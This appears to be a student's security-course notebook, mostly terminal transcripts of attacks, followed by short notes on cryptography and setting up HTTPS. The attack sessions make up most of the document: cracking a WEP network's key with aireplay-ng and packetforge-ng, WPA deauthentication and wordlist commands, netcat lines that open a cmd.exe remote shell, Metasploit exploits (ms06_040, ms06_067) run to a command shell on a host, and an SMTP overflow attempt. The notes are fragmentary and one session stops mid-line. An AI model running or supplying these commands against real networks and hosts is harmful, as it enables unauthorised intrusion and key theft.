Creative idea: Hacker

CIA - information security concepts
Confidentiality: classification levels Top secret / secret / confidential / public, or classified vs. unclassified. Sniffer: attack technique; encryption: defensive technique.
Integrity: hash
Availability
Controllability: mtd

Filter options:
  -b bssid  : MAC address, Access Point
  -d dmac   : MAC address, Destination
  -s smac   : MAC address, Source
  -m len    : minimum packet length
  -n len    : maximum packet length
  -u type   : frame control, type field
  -v subt   : frame control, subtype field
  -t tods   : frame control, To DS bit
  -f fromds : frame control, From DS bit
  -w iswep  : frame control, WEP bit
  -D        : disable AP detection
Replay options:
  -x nbpps  : number of packets per second
  -p fctrl  : set frame control word (hex)
  -a bssid  : set Access Point MAC address
  -c dmac   : set Destination MAC address
  -h smac   : set Source MAC address
  -g value  : change ring buffer size (default: 8)
  -F        : choose first matching packet
Fakeauth attack options:
  -e essid  : set target AP SSID
  -o npckts : number of packets per burst (0=auto, default: 1)
  -q sec    : seconds between keep-alives
  -y prga   : keystream for shared key auth
Arp Replay attack options:
  -j        : inject FromDS packets
Fragmentation attack options:
  -k IP     : set destination IP in fragments
  -l IP     : set source IP in fragments
Test attack options:
  -B        : activates the bitrate test
source options:
  -i iface  : capture packets from this interface
  -r file   : extract packets from this pcap file
attack modes (Numbers can still be used):
  --deauth      count : deauthenticate 1 or all stations (-0)
  --fakeauth    delay : fake authentication with AP (-1)
  --interactive       : interactive frame selection (-2)
  --arpreplay         : standard ARP-request replay (-3)
  --chopchop          : decrypt/chopchop WEP packet (-4)
  --fragment          : generates valid keystream (-5)
  --caffe-latte       : query a client for new IVs (-6)
  --cfrag             : fragments against a client (-7)
  --test              : tests injection and quality (-9)
  --help              : Displays this usage screen

No replay interface specified.

bt # ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:0C:29:4A:BF:A9
          inet addr:172.19.1.200  Bcast:172.19.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:3475 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4434 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:292204 (285.3 KiB)  TX bytes:3357741 (3.2 MiB)
          Interrupt:16 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

wlan0     Link encap:UNSPEC  HWaddr 00-C0-CA-1E-E2-B4-00-00-00-00-00-00-00-00-00-00
          UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI  MTU:1500  Metric:1
          RX packets:8840 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:1233831 (1.1 MiB)  TX bytes:0 (0.0 b)

bt # aireplay-ng -1 0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan0
03:31:37  Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 1
03:31:37  Sending Authentication Request (Open System) ACK
03:31:37  Authentication successful
03:31:37  Sending Association Request ACK
03:31:37  Association successful :-) (AID: 1)

bt # aireplay-ng
Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng
(usage screen identical to the one above)
No replay interface specified.

bt # aireplay-ng -5 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 wlan0
03:33:40  Waiting for beacon frame (BSSID: 00:1F:33:D3:7C:F4) on channel 1
03:33:40  Waiting for a data packet.
Read 210 packets.

        Size: 107, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1F:33:D3:7C:F4
          Dest. MAC  =  00:1F:33:D3:7C:F4
         Source MAC  =  00:0C:F1:21:5E:EB

        0x0000:  0841 d500 001f 33d3 7cf4 000c f121 5eeb  .A3.|!.
        0x0010:  001f 33d3 7cf4 0039 1c24 f400 9af4 0dbb  3.|9.$
        0x0020:  0ca8 ebf1 e460 1a05 fb96 943f d1e5 819d  .?
        0x0030:  a7bb 241b 3db4 517a 935d 82e6 d851 beca  $.=.Qz.Q
        0x0040:  7257 d1f2 e17d 4715 6116 90cf 83cd d987  rW.G.a.
        0x0050:  772f 6675 26d6 76d6 99f1 08d8 b8ec c13e  w/fu&.v
        0x0060:  e495 2a0a c933 90d9 4330 e3                *3C0.

Use this packet ? y
Saving chosen packet in replay_src-1207-033342.cap
03:33:48  Data packet found!
03:33:48  Sending fragmented packet
03:33:48  Got RELAYED packet!
03:33:48  Trying to get 384 bytes of a keystream
03:33:48  Got RELAYED packet!
03:33:48  Trying to get 1500 bytes of a keystream
03:33:48  Got RELAYED packet!
Saving keystream in fragment-1207-033348.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

bt # packetforge-ng
Packetforge-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe
Original work: Christophe Devine and Martin Beck
http://www.aircrack-ng.org
Usage: packetforge-ng
Forge options:
  -p     : set frame control word (hex)
  -a     : set Access Point MAC address
  -c     : set Destination MAC address
  -h     : set Source MAC address
  -j     : set FromDS bit
  -o     : clear ToDS bit
  -e     : disables WEP encryption
  -k     : set Destination IP Port
  -l     : set Source IP Port
  -t ttl : set Time To Live
  -w     : write packet to this pcap file
  -s     : specify size of null packet
  -n     : set number of packets to generate
Source options:
  -r     : read packet from this raw file
  -y     : read PRGA from this file
Modes:
  --arp    : forge an ARP packet (-0)
  --udp    : forge an UDP packet (-1)
  --icmp   : forge an ICMP packet (-2)
  --null   : build a null packet (-3)
  --custom : build a custom packet (-9)
  --help   : Displays this usage screen
Please specify a mode.

bt # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fr
fragment-1020-130603.xor  fragment-1108-025108.xor  fragment-1130-070213.xor
fragment-1028-071313.xor  fragment-1112-081947.xor  fragment-1206-053848.xor
fragment-1028-084211.xor  fragment-1125-061640.xor  fragment-1207-033348.xor
bt # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -r taiyuanarp wlan0
open failed: No such file or directory
bt # packetforge-ng -0 -a 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -l 255.255.255.255 -k 255.255.255.255 -y /root/fragment-1207-033348.xor -w taiyuanarp wlan0
Wrote packet to: taiyuanarp

bt # aireplay-ng
Aireplay-ng 1.0 rc1 r1083 - (C) 2006,2007,2008 Thomas d'Otreppe
Original work: Christophe Devine
http://www.aircrack-ng.org
usage: aireplay-ng
(usage screen identical to the one above)
No replay interface specified.

bt # aireplay-ng -2 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4
No replay interface specified.
"aireplay-ng --help" for help.
bt # aireplay-ng -2 -x 1024 -b 00:1f:33:d3:7c:f4 -h 00:C0:CA:1E:E2:B4 -r /root/taiyuanarp wlan0

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

              BSSID  =  00:1F:33:D3:7C:F4
          Dest. MAC  =  FF:FF:FF:FF:FF:FF
         Source MAC  =  00:C0:CA:1E:E2:B4

        0x0000:  0841 0201 001f 33d3 7cf4 00c0 ca1e e2b4  .A3.|.
        0x0010:  ffff ffff ffff 8001 8268 cb00 f50e 9369  .h.i
        0x0020:  b050 8f87 9697 48ad 5237 d0de ad4b 0d4f  .PH.R7.K.O
        0x0030:  4f31 d217 feb0 2b52 b1a3 b8fa a535 9bca  O1+R.5
        0x0040:  b3ac a461                                .a

Use this packet ? y
Saving chosen packet in replay_src-1207-033730.cap
You should also start airodump-ng to capture replies.
End of file.

bt taiyuan # aircrack-ng *.ivs
Opening taiyuan-01.ivs
Read 9753 packets.

   #  BSSID              ESSID                       Encryption
   1  00:1F:33:D3:7C:F4  sony                        WEP (9751 IVs)
   2  00:60:B3:33:7C:01  Shanxi University Wireless  Unknown

Index number of target network ? 1
Opening taiyuan-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 10666 ivs.

Cracking WPA
aireplay-ng -0 5 -a 00:1f:33:d3:7c:f4 -c 00-1B-77-11-1D-11 wlan0
aircrack-ng *.ivs -w /root/wordlist.txt (hash / rainbow table)
A complete four-way handshake must be captured first.

Buffer overflow
1. On host A: nc.exe -l -p 8000; on host B: telnet ip_a 8000
2. On host A: nc.exe -l -p 9000 -t -e c:\windows\system32\cmd.exe; on host B: telnet ip_a 9000
3. On host A: nc.exe -l -p 10000; on host B: nc.exe -t -e c:\windows\system32\cmd.exe ip_a 10000
Shellcode: a piece of code used to obtain the corresponding privileges.

show exploits
use netapi_ms06_040
show options
set RHOST 172.19.1.236
set PAYLOAD win32_bind
(if set PAYLOAD win32_reverse is chosen instead, the parameter set LHOST <attacking host address> is required)
exploit

msf > use windows/browser/ms06_067_keyframe
msf exploit(ms06_067_keyframe) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000/XP/2003 Universal

msf exploit(ms06_067_keyframe) > set SRVHOST 172.19.1.200
SRVHOST => 172.19.1.200
msf exploit(ms06_067_keyframe) > set URIPATH admin
URIPATH => admin
msf exploit(ms06_067_keyframe) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.19.1.200     yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  admin            no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000/XP/2003 Universal

msf exploit(ms06_067_keyframe) > exploit
[-] Exploit failed: A payload has not been selected.
msf exploit(ms06_067_keyframe) > set PAYLOAD windows/shell
set PAYLOAD windows/shell/bind_tcp         set PAYLOAD windows/shell_bind_tcp
set PAYLOAD windows/shell/reverse_http     set PAYLOAD windows/shell_bind_tcp_xpfw
set PAYLOAD windows/shell/reverse_ord_tcp  set PAYLOAD windows/shell_reverse_tcp
set PAYLOAD windows/shell/reverse_tcp
msf exploit(ms06_067_keyframe) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms06_067_keyframe) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  172.19.1.200     yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Use SSL
   URIPATH  admin            no        The URI to use for this exploit (default is random)

Payload options:

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows 2000/XP/2003 Universal

msf exploit(ms06_067_keyframe) > exploit
[*] Using URL: http://172.19.1.200:8080/admin
[*] Server started.
msf exploit(ms06_067_keyframe) >
[*] Sending exploit to 172.19.1.214:3011.
[*] Started bind handler
[*] Sending stage (474 bytes)
[*] Command shell session 2 op

DoS (denial of service)
cmd
Telnet
Set localecho
Quit
Telnet 172.19.1.214 25
Helo
Help
Mail from:
Rcpt to:
Data
Aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.

Encryption and decryption techniques
Shannon: confusion & diffusion
1. Keys are used in pairs.
2. The public key encrypts, the private key decrypts.
3. The private key signs, the public key verifies.
Man-in-the-middle attack
Birthday attack: if the same key is used to encrypt different data, security is at risk.
RSA: can both encrypt/decrypt and sign/verify.
DSA: digital signatures only.
DH: can be used neither for encryption/decryption nor for signing/verification; it is used for key agreement.
12345  827CCB0EEA8A706C4C34A16891F84E7B
12344  D10906C3DAC1172D4F60BD41F224AE75
SSL: Secure Socket Layer; https: port 443

Lab: setting up HTTPS
1. Set up a CA.
2. The server requests a certificate.
3. Submit the request through certsrv (the certificate server).
4. After the CA receives the request, it verifies it and issues the certificate.
5. Export the certificate and install it on the server (IIS).
Application layer: SSL; transport layer: VPN; using ARP & IP spoofing